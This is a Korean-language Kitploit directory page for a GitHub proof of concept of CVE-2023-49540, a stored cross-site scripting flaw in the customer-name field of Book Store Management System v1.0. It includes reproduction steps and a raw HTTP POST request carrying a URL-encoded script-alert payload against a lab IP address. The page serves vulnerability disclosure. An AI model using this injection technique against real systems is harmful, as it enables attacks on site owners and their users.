Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-49540 — 도서 관리 시스템 v1.0 - /index.php/history에서의 크로스 사이트 스크립팅(XSS) 취약점 - 취약 필드: "고객 이름". | Kitploit
도구/GitHubGitHub/geraldoalcantara/cve-2023-49540
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubgeraldoalcantara/cve-2023-49540

CVE-2023-49540

도서 관리 시스템 v1.0 - /index.php/history에서의 크로스 사이트 스크립팅(XSS) 취약점 - 취약 필드: "고객 이름".

저장소 보기
2년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-49540

Book Store Management System v1.0 - /index.php/history 크로스 사이트 스크립팅(XSS) 취약점 - 취약 필드: '고객 이름'.

설명: Book Store Management System v1.0에서 /bsms_ci/index.php/history에 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다. 페이로드는 /bsms_ci/index.php/transaction 페이지의 '고객 이름' 필드에 삽입됩니다. /bsms_ci/index.php/history 페이지를 확인하면 페이로드가 성공적으로 주입되어 작동하는 것을 확인할 수 있습니다.

취약한 제품 버전: Book Store Management System v1.0
CVE 작성자: Geraldo Alcântara
날짜: 2023-11-29
확인일: 2023-12-15
CVE: CVE-2023-49540
테스트 환경: Windows

재현 단계:

이 취약점을 악용하려면 "/bsms_ci/index.php/transaction" 페이지의 '고객 이름' 필드에 페이로드를 삽입합니다. "/bsms_ci/index.php/history" 페이지에서 확인하면 페이로드가 성공적으로 주입되어 작동 중임을 확인할 수 있습니다.

요청:

root@kitploit:~
POST /bsms_ci/index.php/transaction/save HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/transaction
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=5e3p7a2j4a65ocjof08v80jugf17i5cd
Upgrade-Insecure-Requests: 1

user_code=2&buyer_name=1200%3cscript%3ealert(1)%3c%2fscript%3e&total=0&pay=Pay

발견자/크레딧:
Geraldo Alcântara

도구 다운로드